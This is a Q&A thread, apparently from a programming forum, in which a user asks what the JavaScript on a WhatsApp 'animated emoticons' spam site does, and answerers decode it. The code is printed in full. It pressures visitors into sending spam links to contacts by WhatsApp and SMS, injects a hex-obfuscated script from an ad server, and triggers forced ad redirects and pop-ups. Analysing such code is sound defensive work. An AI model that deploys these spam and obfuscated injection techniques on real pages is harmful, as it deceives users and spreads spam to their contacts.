# Malicious website: decyphering the code?

Tags: javascript, html, spam, malware

So here is a malicious website trying to spam people into spreading their website further, which also leads to an advertisement - I suggest enabling noscript.
http://trucchiios.com/emoticon/index_en.php
Now I have the code here that gets executed when you push the big whatsapp button, but what does it do?

```
c = 0;
var image;

function fn1(x)
{
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // some code..
        ++c;
        if (c <= 6)
        {
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            if (c == 2) {
                ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
            } else if (c == 4) {
                ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
            }
        } else if (c <= 10) {
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            if (c == 7) {
                ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
            }
            var head = document.getElementsByTagName('head').item(0);
            var _0xc631 = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x73\x2E\x73\x70\x72\x69\x6E\x74\x72\x61\x64\x65\x2E\x63\x6F\x6D\x2F\x61\x64\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70\x3F\x70\x69\x64\x3D\x38\x36\x37\x33\x26\x6F\x72\x64\x3D\x5B\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x5D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
            var script = document[_0xc631[1]](_0xc631[0]);
            script[_0xc631[2]] = _0xc631[3];
            script[_0xc631[4]] = _0xc631[5];
            head[_0xc631[6]](script);
        } else
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}

function fn3(x) {
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // some code..
        ++c;
        if (c <= 10) {
            window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
        } else
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}

function fn2(x) {
    if (c >= 10)
    {
        window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else
    {
        window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited  " + c + " contacts.");
    }
}
var n = 300,
    t = setInterval(function() {
        $("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
    }, 1e3);
```

I would just like someone to tell me what it does. I suspect it's just an adspam, not actual malware, but please take a look into it.

Answer (score 2, accepted):

It seems this code is responsible for the increasing amount of spam messages received in the last week. I am quite sure this code is sending a link to malicious website using Whatsapp web:

```
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");
```

If using a mobile device,

```
if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {
```

Also tries to send a SMS:

```
"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");
```

Some other addware sites are loaded when this code gets executed. This code seems to perform some other tasks, but it is hard to know. The script  is written using Javascript.

Comment: I noticed this as well,
what it does it has a variable counter that feels like an achievement - you sent it to (X) contacts, congrats here's a smiley
then it sends the message to all your friends in your friendslist i assume, and then later on it directs you to an ad. 
really sad these spammers. this is so annoying

Answer (score 2):

It adds javascript file : `http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]`.

The full code :

```
var _0xc631 = ["script", "createElement", "type", "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]", "appendChild"]    
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);
```

"Normal" code :

```
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]";
head.appendChild(script);
```

The webpage `.../adscript.php?pid=8673&ord=[timestamp]`, use cache header **to show only one time**. On the first view, you get :

```
 if(typeof(document.asm_excl) == "undefined"){ document.asm_excl = new Array(); } document.asm_excl = document.asm_excl.concat(String("").split("|")); if(typeof(document.asm_max_2398) == "undefined"){ document.asm_max_2398 = 1; }
 else{ document.asm_max_2398++; }

 var asm_ex = false;
 var asm_ex_all = false;
 for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "2398"){asm_ex = true; break;}}
 for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "w21272" || document.asm_excl[asm_i] == "p8673"){asm_ex_all = true; break;}}
 if(asm_ex_all){}
 else if(!asm_ex  && document.asm_max_2398 <= 1)
 {
   document.write(''); 
(function ()
 {
  var s, r, t;
  r = false;
  s = document.createElement("script");
  s.type = "text/javascript";
  s.src = "http://cdn.adspirit.de/banner/asmpop_async.js";
  s.readySet = false;
  s.onload = function (){if(!this.readySet){this.readySet=true;asm_pop_asmfls8673x5396511y1447611443();}};
  s.onreadystatechange = function (){if ( !this.readySet && (!this.readyState || this.readyState == "complete")){this.readySet=true; asm_pop_asmfls8673x5396511y1447611443();}};
  function asm_pop_asmfls8673x5396511y1447611443()
  {
   r = true;
   var asm_pop_options = new Object()
   asm_pop_options.url = "http://ads.sprintrade.com/adpop.php?tz=1447611443715312&pid=8673&kid=2398&wmid=28565&wsid=21272&uid=9&ord=%5Btimestamp%5D&wpcn=asmpvx8547661447611443";
   asm_pop_options.breite = "1920";
   asm_pop_options.hoehe = "1080";
   asm_pop_options.links = "0";
   asm_pop_options.oben = "0";
   asm_pop_options.ops = "alwaysLowered=0,alwaysRaised=1,dependent=0,fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=1,status=0,titlebar=0,toolbar=0,disableFullscreen=0,disableClose=0,disableBorder=0";
   asm_pop_options.layeronly = false;
   asm_pop_options.popunder = false;
   asm_pop_options.canlayer = false;
   asm_pop_options.clickpop = true;
   asm_pop_options.close = "0";
   asm_pop_options.booLoad = true;
   asm_pop_options.loadTime = "2";
   asm_pop_options.closeTime = "0";
   asm_pop_options.cookdom = "sprintrade.com";
   asm_pop_options.poptitle = "";
   asm_pop_options.popdomain = "http://cdn.adspirit.de";
   asm_pop_options.kid = "2398";
   asm_pop_options.pid = "8673";
   asm_pop_options.id = "asmfls8673x5396511y1447611443";
   window.asm_pop_asmfls8673x5396511y1447611443 = new asm_popup(asm_pop_options);
  }
  var ss = document.getElementsByTagName("script");
  if(ss.length>0){ ss[ss.length-1].parentNode.insertBefore(s, ss[ss.length-1].nextSibling); }
  else if(document.body){document.body.appendChild(s);}
 })()
   document.write(''); 

 }
 else
 {
  document.write('<scr'+'ipt type="text\/javasc'+'ript" language="JavaSc'+'ript" src="http://ads.sprintrade.com/adscript.php?pid=8673&hr=1&nrc=1&&wpcn=asmpvx8547661447611443&ex=|2398&ord='+(new Date()).getTime()+'"><\/scr'+'ipt>');
 }
```

After you get :

```
 document.write('');
```

The script is make **to run only one time**.

Answer (score 1):

The language is Javascript.

These are pretty much the same as `mailto:` links (which calls the default application for emails), but in this case, it calls the default WhatsApp application or the SMS application (depending on the OS) which then sends out the ad.

(`%0D%0A` is an unescape encoded string for `CRLF`)

---

But then again, if you say it's a big "WhatsApp" button, what did you expect it to do?